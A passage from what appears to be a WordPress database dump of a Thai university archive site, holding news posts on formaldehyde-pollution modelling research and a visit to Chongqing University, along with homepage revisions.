องค์การอนามัยโลกได้ประกาศอย่างเป็นทางการว่าเป็นสารก่อมะเร็งในสัตว์ทดลอง และมีความเสี่ยงที่จะทำให้เกิดมะเร็งในมนุษย์ได้ แหล่งของฟอร์มาลดีไฮด์ที่สำคัญแหล่งหนึ่งคือยูเรียฟอร์มาลดีไฮด์เรซิน ซึ่งสารเคมีชนิดนี้ใช้เป็นสารตั้งต้นในการผลิตกาวไม้อัด ทั้งที่มีปัญหาสิ่งแวดล้อมดังที่ได้กล่าวมาแล้ว แต่ปัจจุบันมากกว่า 90 เปอร์เซ็นต์ของไม้อัดที่ใช้กันปัจจุบันทั่วโลกได้ใช้ยูเรียฟอร์มาลดีไฮด์เป็นกาว เนื่องจากมีต้นทุนการผลิตต่ำ และให้สมบัติที่ดีในแง่ของความแข็งแรง จึงเป็นเหตุทำให้มีรายงานวิจัยในหลายๆ ปีที่ผ่านมา ว่ามลพิษทางอากาศจากการแพร่ของฟอร์มาลดีไฮด์ (formaldehyde emission) ที่เกิดขึ้นทั้งในบ้านและสำนักงาน มาจากการใช้วัสดุก่อสร้างเฟอร์นิเจอร์ที่มีกาวยูเรียฟอร์มาลดีไฮด์เป็นองค์ประกอบ\r\n\r\nจากปัญหาดังกล่าว ทำให้ประเทศในยุโรปมีการกำหนดมาตรฐานควบคุมปริมาณฟอร์มาลดีไฮด์ตกค้างอยู่ในผลิตภัณฑ์ไม้อัดและเฟอร์นิเจอร์ และขณะนี้ประเทศสหรัฐอเมริกาได้ออกมาตรการควบคุมมลพิษที่ลอยในอากาศ เพื่อลดการแพร่กระจายของฟอร์มาลดีไฮด์ จากผลิตภัณฑ์ที่มีส่วนประกอบของไม้ นอกจากอุตสาหกรรมกาวไม้อัดแล้ว ยังมีอุตสาหกรรมอื่นๆ ที่เกี่ยวข้องกับยูเรียฟอร์มาลดีไฮด์ คืออุตสาหกรรมการตกแต่งสิ่งทอ (textile finishing) และอุตสาหกรรมเคลือบผิววัสดุ (surface coating) ซึ่งได้เกิดปัญหาในทำนองเดียวกัน และมักปลดปล่อยฟอร์มาลดีไฮด์ในระหว่างกระบวนการสังเคราะห์เรซินชนิดนี้ ตนและทีมวิจัยจึงได้คิดค้นงานวิจัยเพื่อลดมลภาวะในสิ่งแวดล้อม โดยใช้การสร้างโมเดลจลนพลศาสตร์ของปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์เรซิน ในขั้นตอนการสังเคราะห์ยูเรียฟอร์มาลดีไฮด์\r\n\r\nโมเดลจลนพลศาสตร์นั้น สร้างขึ้นโดยอาศัยข้อมูลจากกลไกปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์ จากนั้นเป็นการสร้างโมเดลจลนพลศาสตร์จากกลไกปฏิกิริยาและอาศัยเทคนิคการจำลองสถานการณ์ด้วยคอมพิวเตอร์ เพื่อใช้ทำนายปริมาณของฟอร์มาลดีไฮด์ระหว่างการเกิดปฏิกิริยา ปรากฏว่า ผลการคำนวณปริมาณฟอร์มาลดีไฮด์ที่เปลี่ยนแปลง กับเวลาที่เกิดปฏิกิริยาจากการจำลองด้วยคอมพิวเตอร์ สอดคล้องกับผลการทดลองจริง จากนั้นนำโมเดลที่ได้จากการสร้างกราฟความสัมพันธ์ระหว่างตัวแปรต่างๆ ที่มีผลต่อปฏิกิริยา ได้แก่ ปริมาณสัดส่วน อุณหภูมิและ ความเป็นกรด-เบส ต่อปริมาณฟอร์มาลดีไฮด์ที่ตกค้างในพรีพอลิเมอร์แต่ละสภาวะ รวมทั้งระยะเวลาที่เข้าสู่สมดุล โมเดลจลนพลศาสตร์ดังกล่าวยังสามารถใช้ทำนายว่าภายใต้สภาวะสัดส่วนของสารตั้งต้นและอุณหภูมิที่กำหนด จะมีฟอร์มาลดีไฮด์ตกค้างอยู่เท่าใด และช่วยทำนายแนวโน้มการเปลี่ยนแปลงปริมาณหมู่ทำหน้าที่ของสารตั้งต้นและผลิตภัณฑ์ระหว่างการทดลอง ซึ่งช่วยทำให้ผู้ผลิตเลือกสภาวะที่เหมาะสมในการผลิตให้ได้ผลิตภัณฑ์ตามต้องการ และวางแผนเพื่อลดมลพิษอันเกิดจากฟอร์มาลดีไฮด์ที่หลงเหลืออยู่จากการผลิตได้อย่างถูกต้อง งานวิจัยนี้ได้รับทุนสนับสนุนการวิจัยจากงบประมาณแผ่นดิน ผ่านสำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และได้นำเสนอในที่ประชุมวิชาการระดับนานาชาติ (International Conference of Key Engineering Materials 2013) ณ ประเทศมาเลเซีย\r\n\r\n<img src="http://arit.skru.ac.th/si/images/stories/15.jpg" alt="" width="500" height="331" />\r\n\r\n<strong>ภาพและข่าว โดย/ ลัดดา เอ้งเถี้ยว</strong>\r\n<strong>นักประชาสัมพันธ์ มรภ.สงขลา</strong>\r\n\r\nวันที่  11 ธันวาคม 2556', 'นักวิจัย มรภ.สงขลา ใช้โมเดลคณิตลดมลภาวะยูเรีย', '', 'inherit', 'closed', 'closed', '', '86-revision-v1', '', '', '2019-05-26 13:29:56', '2019-05-26 06:29:56', '', 86, 'http://172.17.40.11/wp511/?p=87', 0, 'revision', '', 0),
(88, 1, '2019-05-26 13:30:35', '2019-05-26 06:30:35', '<strong>คณะวิทยาศาสตร์ฯ มรภ.สงขลา ผุดงานวิจัยแก้ปัญหาสิ่งแวดล้อมเน่า ใช้โมเดลคณิตศาสตร์และการประมวลผลโดยคอมพิวเตอร์ </strong>\r\n\r\n<strong>ลดมลภาวะจากการผลิตยูเรีย-ฟอร์มาลดีไฮด์เรซิน</strong>\r\n\r\n       ผศ.ดร.พลพัฒน์ รวมเจริญ ผู้ช่วยคณบดีฝ่ายวิเทศสัมพันธ์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยถึงงานวิจัยเพื่อแก้ไขปัญหาสิ่งแวดล้อมว่า ทั่วโลกกำลังประสบปัญหาสิ่งแวดล้อม เนื่องจากการขยายตัวของอุตสาหกรรม โดยเฉพาะฟอร์มาลดีไฮด์เป็นสารเคมีชนิดหนึ่งที่ก่อให้เกิดมลพิษกับสิ่งแวดล้อม ฟอร์มาลดีไฮด์เป็นก๊าซไม่มีสี มีกลิ่นฉุน ในปี ค.ศ.2004 องค์การอนามัยโลกได้ประกาศอย่างเป็นทางการว่าเป็นสารก่อมะเร็งในสัตว์ทดลอง และมีความเสี่ยงที่จะทำให้เกิดมะเร็งในมนุษย์ได้ แหล่งของฟอร์มาลดีไฮด์ที่สำคัญแหล่งหนึ่งคือยูเรียฟอร์มาลดีไฮด์เรซิน ซึ่งสารเคมีชนิดนี้ใช้เป็นสารตั้งต้นในการผลิตกาวไม้อัด ทั้งที่มีปัญหาสิ่งแวดล้อมดังที่ได้กล่าวมาแล้ว แต่ปัจจุบันมากกว่า 90 เปอร์เซ็นต์ของไม้อัดที่ใช้กันปัจจุบันทั่วโลกได้ใช้ยูเรียฟอร์มาลดีไฮด์เป็นกาว เนื่องจากมีต้นทุนการผลิตต่ำ และให้สมบัติที่ดีในแง่ของความแข็งแรง จึงเป็นเหตุทำให้มีรายงานวิจัยในหลายๆ ปีที่ผ่านมา ว่ามลพิษทางอากาศจากการแพร่ของฟอร์มาลดีไฮด์ (formaldehyde emission) ที่เกิดขึ้นทั้งในบ้านและสำนักงาน มาจากการใช้วัสดุก่อสร้างเฟอร์นิเจอร์ที่มีกาวยูเรียฟอร์มาลดีไฮด์เป็นองค์ประกอบ\r\n\r\nจากปัญหาดังกล่าว ทำให้ประเทศในยุโรปมีการกำหนดมาตรฐานควบคุมปริมาณฟอร์มาลดีไฮด์ตกค้างอยู่ในผลิตภัณฑ์ไม้อัดและเฟอร์นิเจอร์ และขณะนี้ประเทศสหรัฐอเมริกาได้ออกมาตรการควบคุมมลพิษที่ลอยในอากาศ เพื่อลดการแพร่กระจายของฟอร์มาลดีไฮด์ จากผลิตภัณฑ์ที่มีส่วนประกอบของไม้ นอกจากอุตสาหกรรมกาวไม้อัดแล้ว ยังมีอุตสาหกรรมอื่นๆ ที่เกี่ยวข้องกับยูเรียฟอร์มาลดีไฮด์ คืออุตสาหกรรมการตกแต่งสิ่งทอ (textile finishing) และอุตสาหกรรมเคลือบผิววัสดุ (surface coating) ซึ่งได้เกิดปัญหาในทำนองเดียวกัน และมักปลดปล่อยฟอร์มาลดีไฮด์ในระหว่างกระบวนการสังเคราะห์เรซินชนิดนี้ ตนและทีมวิจัยจึงได้คิดค้นงานวิจัยเพื่อลดมลภาวะในสิ่งแวดล้อม โดยใช้การสร้างโมเดลจลนพลศาสตร์ของปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์เรซิน ในขั้นตอนการสังเคราะห์ยูเรียฟอร์มาลดีไฮด์\r\n\r\nโมเดลจลนพลศาสตร์นั้น สร้างขึ้นโดยอาศัยข้อมูลจากกลไกปฏิกิริยาการเกิดยูเรียฟอร์มาลดีไฮด์ จากนั้นเป็นการสร้างโมเดลจลนพลศาสตร์จากกลไกปฏิกิริยาและอาศัยเทคนิคการจำลองสถานการณ์ด้วยคอมพิวเตอร์ เพื่อใช้ทำนายปริมาณของฟอร์มาลดีไฮด์ระหว่างการเกิดปฏิกิริยา ปรากฏว่า ผลการคำนวณปริมาณฟอร์มาลดีไฮด์ที่เปลี่ยนแปลง กับเวลาที่เกิดปฏิกิริยาจากการจำลองด้วยคอมพิวเตอร์ สอดคล้องกับผลการทดลองจริง จากนั้นนำโมเดลที่ได้จากการสร้างกราฟความสัมพันธ์ระหว่างตัวแปรต่างๆ ที่มีผลต่อปฏิกิริยา ได้แก่ ปริมาณสัดส่วน อุณหภูมิและ ความเป็นกรด-เบส ต่อปริมาณฟอร์มาลดีไฮด์ที่ตกค้างในพรีพอลิเมอร์แต่ละสภาวะ รวมทั้งระยะเวลาที่เข้าสู่สมดุล โมเดลจลนพลศาสตร์ดังกล่าวยังสามารถใช้ทำนายว่าภายใต้สภาวะสัดส่วนของสารตั้งต้นและอุณหภูมิที่กำหนด จะมีฟอร์มาลดีไฮด์ตกค้างอยู่เท่าใด และช่วยทำนายแนวโน้มการเปลี่ยนแปลงปริมาณหมู่ทำหน้าที่ของสารตั้งต้นและผลิตภัณฑ์ระหว่างการทดลอง ซึ่งช่วยทำให้ผู้ผลิตเลือกสภาวะที่เหมาะสมในการผลิตให้ได้ผลิตภัณฑ์ตามต้องการ และวางแผนเพื่อลดมลพิษอันเกิดจากฟอร์มาลดีไฮด์ที่หลงเหลืออยู่จากการผลิตได้อย่างถูกต้อง งานวิจัยนี้ได้รับทุนสนับสนุนการวิจัยจากงบประมาณแผ่นดิน ผ่านสำนักงานคณะกรรมการวิจัยแห่งชาติ (วช.) และได้นำเสนอในที่ประชุมวิชาการระดับนานาชาติ (International Conference of Key Engineering Materials 2013) ณ ประเทศมาเลเซีย\r\n\r\n\r\n\r\n<strong>ภาพและข่าว โดย/ ลัดดา เอ้งเถี้ยว</strong>\r\n<strong>นักประชาสัมพันธ์ มรภ.สงขลา</strong>\r\n\r\nวันที่  11 ธันวาคม 2556', 'นักวิจัย มรภ.สงขลา ใช้โมเดลคณิตลดมลภาวะยูเรีย', '', 'inherit', 'closed', 'closed', '', '86-revision-v1', '', '', '2019-05-26 13:30:35', '2019-05-26 06:30:35', '', 86, 'http://172.17.40.11/wp511/?p=88', 0, 'revision', '', 0),
(89, 1, '2019-05-26 13:31:59', '2019-05-26 06:31:59', '       รศ.ดร.สุนทร โสตถิพันธุ์ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) กล่าวถึงการนำคณะผู้บริหาร คณาจารย์ บุคลากรและนักศึกษาคณะศิลปกรรมศาสตร์ ไปร่วมงานฉลองครบรอบ 84 ปี มหาวิทยาลัยฉงชิ่ง ประเทศจีน ว่า นอกจากการหารือทางวิชาการแล้ว ทั้ง 2 มหาวิทยายังได้เผยแพร่ศิลปวัฒนธรรมการแสดงและกระชับสายสัมพันธ์ไทย-จีน โดยคณะศิลปกรรมศาสตร์ มรภ.สงขลา ได้จัดการแสดงดนตรีวงออร์เคสตร้า ซึ่งเป็นการบรรเลงร่วมกันระหว่างดนตรีสากลและดนตรีไทย ทั้งเพลงพระราชนิพนธ์ เพลงไทยเดิม เพลงสากล และเพลงพื้นบ้านภาคใต้ เพื่อประกอบการแสดงวัฒนธรรมภาคใต้ ส่วนชุดการแสดงนาฏศิลป์มี 4 ชุด ได้แก่ ระบำเทพนิมิตนวลทองสำลี โนรา ระบำบาติก และการแสดงชุดหนุมานจับนางเบญกาย นอกจากนี้ ยังมีการขับร้องเพลงฉงชิ่งแดนสวรรค์ และการเดี่ยวซอสามสายในเพลงแสนคำนึง ซึ่งทุกกิจกรรมได้แสดงถึงศักยภาพของอาจารย์และนักศึกษา มรภ.สงขลา ส่วนคณะศิลปกรรมศาสตร์ มหาวิทยาลัยฉงชิ่ง จัดการแสดง 4 ชุด ได้แก่ การบรรเลงเพลงจีนโดยเครื่องดนตรีจีน ระบำมองโกล การร้องเพลงประกอบจินตลีลา เพื่อฉลองครบรอบ 84 ปีมหาวิทยาลัยฉงชิ่ง และเผยแพร่วัฒนธรรมการแสดงของจีน\r\n\r\n       อธิการบดี มรภ.สงขลากล่าวว่า การเดินทางไปครั้งนี้สอดคล้องกับกลยุทธ์ของมหาวิทยาลัย และคณะศิลปกรรมศาสตร์ ด้านการส่งเสริมและสนับสนุนการเผยแพร่ผลงานด้านศิลปะและวัฒนธรรมสู่เวทีระดับชาติและนานาชาติ ซึ่งได้รับการสนับสนุนจากมหาวิทยาลัยทั้งในด้านวิเทศสัมพันธ์ วิชาการ และงบประมาณ ในการดำเนินโครงการสำเร็จลุล่วงไปด้วยดี และได้รับการต้อนรับอย่างอบอุ่นจากมหาวิทยาลัยฉงชิ่ง โดยตั้งชื่องานว่า ราตรีแห่งวัฒนธรรมไทย\r\n\r\n       รายงานข่าวเผยว่า การเดินทางไปร่วมงานครั้งนี้คณะผู้บริหาร มรภ.สงขลาได้ร่วมประชุมนำเสนอเกี่ยวกับการพัฒนาประเทศไทย และศึกษาดูงานเพื่อศึกษาความเป็นไปได้ในโครงการความร่วมมือทางวิชาการ เพื่อแลกเปลี่ยนอาจารย์ นักศึกษา และการจัดทำหลักสูตรร่วมกันระหว่างคณะศิลปกรรมศาสตร์ มรภ.สงขลา และคณะศิลปกรรมศาสตร์ มหาวิทยาลัยฉงชิ่ง พร้อมทั้งพูดคุยถึงการช่วยจัดตั้งโปรแกรมวิชาภาษาจีน ของคณะมนุษยศาสตร์และสังคมศาสตร์ มรภ.สงขลา\r\n\r\n \r\n\r\nที่มา  :  ข่าวสด  วันที่ 25 พฤศจิกายน 2556 หน้า 23', 'มรภ.สงขลาจับมือม.ฉงชิ่ง พี่เลี้ยงเขียนหลักสูตรวิชาภาษาจีน', '', 'trash', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2%e0%b8%88%e0%b8%b1%e0%b8%9a%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a1-%e0%b8%89%e0%b8%87%e0%b8%8a%e0%b8%b4%e0%b9%88%e0%b8%87__trashed', '', '', '2019-05-27 09:30:03', '2019-05-27 02:30:03', '', 0, 'http://172.17.40.11/wp511/?p=89', 0, 'post', '', 0),
(90, 1, '2019-05-26 13:31:59', '2019-05-26 06:31:59', '       รศ.ดร.สุนทร โสตถิพันธุ์ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) กล่าวถึงการนำคณะผู้บริหาร คณาจารย์ บุคลากรและนักศึกษาคณะศิลปกรรมศาสตร์ ไปร่วมงานฉลองครบรอบ 84 ปี มหาวิทยาลัยฉงชิ่ง ประเทศจีน ว่า นอกจากการหารือทางวิชาการแล้ว ทั้ง 2 มหาวิทยายังได้เผยแพร่ศิลปวัฒนธรรมการแสดงและกระชับสายสัมพันธ์ไทย-จีน โดยคณะศิลปกรรมศาสตร์ มรภ.สงขลา ได้จัดการแสดงดนตรีวงออร์เคสตร้า ซึ่งเป็นการบรรเลงร่วมกันระหว่างดนตรีสากลและดนตรีไทย ทั้งเพลงพระราชนิพนธ์ เพลงไทยเดิม เพลงสากล และเพลงพื้นบ้านภาคใต้ เพื่อประกอบการแสดงวัฒนธรรมภาคใต้ ส่วนชุดการแสดงนาฏศิลป์มี 4 ชุด ได้แก่ ระบำเทพนิมิตนวลทองสำลี โนรา ระบำบาติก และการแสดงชุดหนุมานจับนางเบญกาย นอกจากนี้ ยังมีการขับร้องเพลงฉงชิ่งแดนสวรรค์ และการเดี่ยวซอสามสายในเพลงแสนคำนึง ซึ่งทุกกิจกรรมได้แสดงถึงศักยภาพของอาจารย์และนักศึกษา มรภ.สงขลา ส่วนคณะศิลปกรรมศาสตร์ มหาวิทยาลัยฉงชิ่ง จัดการแสดง 4 ชุด ได้แก่ การบรรเลงเพลงจีนโดยเครื่องดนตรีจีน ระบำมองโกล การร้องเพลงประกอบจินตลีลา เพื่อฉลองครบรอบ 84 ปีมหาวิทยาลัยฉงชิ่ง และเผยแพร่วัฒนธรรมการแสดงของจีน\r\n\r\n       อธิการบดี มรภ.สงขลากล่าวว่า การเดินทางไปครั้งนี้สอดคล้องกับกลยุทธ์ของมหาวิทยาลัย และคณะศิลปกรรมศาสตร์ ด้านการส่งเสริมและสนับสนุนการเผยแพร่ผลงานด้านศิลปะและวัฒนธรรมสู่เวทีระดับชาติและนานาชาติ ซึ่งได้รับการสนับสนุนจากมหาวิทยาลัยทั้งในด้านวิเทศสัมพันธ์ วิชาการ และงบประมาณ ในการดำเนินโครงการสำเร็จลุล่วงไปด้วยดี และได้รับการต้อนรับอย่างอบอุ่นจากมหาวิทยาลัยฉงชิ่ง โดยตั้งชื่องานว่า ราตรีแห่งวัฒนธรรมไทย\r\n\r\n       รายงานข่าวเผยว่า การเดินทางไปร่วมงานครั้งนี้คณะผู้บริหาร มรภ.สงขลาได้ร่วมประชุมนำเสนอเกี่ยวกับการพัฒนาประเทศไทย และศึกษาดูงานเพื่อศึกษาความเป็นไปได้ในโครงการความร่วมมือทางวิชาการ เพื่อแลกเปลี่ยนอาจารย์ นักศึกษา และการจัดทำหลักสูตรร่วมกันระหว่างคณะศิลปกรรมศาสตร์ มรภ.สงขลา และคณะศิลปกรรมศาสตร์ มหาวิทยาลัยฉงชิ่ง พร้อมทั้งพูดคุยถึงการช่วยจัดตั้งโปรแกรมวิชาภาษาจีน ของคณะมนุษยศาสตร์และสังคมศาสตร์ มรภ.สงขลา\r\n\r\n \r\n\r\nที่มา  :  ข่าวสด  วันที่ 25 พฤศจิกายน 2556 หน้า 23', 'มรภ.สงขลาจับมือม.ฉงชิ่ง พี่เลี้ยงเขียนหลักสูตรวิชาภาษาจีน', '', 'inherit', 'closed', 'closed', '', '89-revision-v1', '', '', '2019-05-26 13:31:59', '2019-05-26 06:31:59', '', 89, 'http://172.17.40.11/wp511/?p=90', 0, 'revision', '', 0),
(91, 1, '2019-05-26 13:49:12', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'open', '', '', '', '', '2019-05-26 13:49:12', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=91', 0, 'post', '', 0),
(92, 1, '2019-05-26 13:49:27', '2019-05-26 06:49:27', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://youtu.be/0uxQkIus27A\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', '', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 13:49:27', '2019-05-26 06:49:27', '', 5, 'http://172.17.40.11/wp511/?p=92', 0, 'revision', '', 0),
(93, 1, '2019-05-26 14:02:08', '2019-05-26 07:02:08', '', 'เข้าสู่ระบบ', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%aa%e0%b8%b9%e0%b9%88%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a', '', '', '2019-05-26 14:02:08', '2019-05-26 07:02:08', '', 0, 'http://172.17.40.11/wp511/?p=93', 1, 'nav_menu_item', '', 0),
(94, 1, '2019-05-26 14:35:15', '2019-05-26 07:35:15', '<h1><strong>จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา</strong></h1>\r\nบันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', '', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 14:35:15', '2019-05-26 07:35:15', '', 5, 'http://172.17.40.11/wp511/?p=94', 0, 'revision', '', 0),
(95, 1, '2019-05-26 14:36:28', '2019-05-26 07:36:28', 'บันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n<img class="size-medium wp-image-7 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/skru-300x158.jpg" alt="" width="300" height="158" />\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 14:36:28', '2019-05-26 07:36:28', '', 5, 'http://172.17.40.11/wp511/?p=95', 0, 'revision', '', 0),
(96, 1, '2019-05-26 14:37:16', '2019-05-26 07:37:16', 'บันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg\r\n\r\n<iframe style="border: 0;" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1979.303436371049!2d100.61276115648289!3d7.171360398979742!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x304d32ce87369b7f%3A0x3c6b99e70c86f3ab!2z4Lih4Lir4Liy4Lin4Li04LiX4Lii4Liy4Lil4Lix4Lii4Lij4Liy4LiK4Lig4Lix4LiP4Liq4LiH4LiC4Lil4Liy!5e0!3m2!1sth!2sth!4v1558839307053!5m2!1sth!2sth" width="600" height="450" frameborder="0" allowfullscreen="allowfullscreen"></iframe>', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 14:37:16', '2019-05-26 07:37:16', '', 5, 'http://172.17.40.11/wp511/?p=96', 0, 'revision', '', 0),
(97, 1, '2019-05-26 14:37:36', '2019-05-26 07:37:36', 'บันทึกเรื่องราวต่างๆ ของมหาวิทยาลัยราชภัฏสงขลา เช่น ประวัติ, สี, ตรา, ดอกไม้, ต้นไม้, เพลง, ครุยวิทยะฐานะ, ทำเนียบผู้บริหาร, อาจารย์เกษียณอายุราชการ, บัณฑิตกิตติมศักดิ์, บุคคลดีเด่น, เหตุการณ์ ข่าว, ภาพแห่งความทรงจำ, ผลงานอาจารย์ นักศึกษา, เอกสารเผยแพร่ ของมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n[caption id="attachment_11" align="aligncenter" width="234"]<a href="http://www.skru.ac.th" target="_blank" rel="noopener noreferrer"><img class="wp-image-11 size-medium" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU-S-1-234x300.png" alt="" width="234" height="300" /></a> เว็บไซต์มหาวิทยาลัยราชภัฏสงขลา[/caption]\r\n\r\n&nbsp;\r\n\r\nhttps://www.youtube.com/watch?v=y22195UuDTg\r\n\r\n', 'จดหมายเหตุ มหาวิทยาลัยราชภัฏสงขลา', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2019-05-26 14:37:36', '2019-05-26 07:37:36', '', 5, 'http://172.17.40.11/wp511/?p=97', 0, 'revision', '', 0),
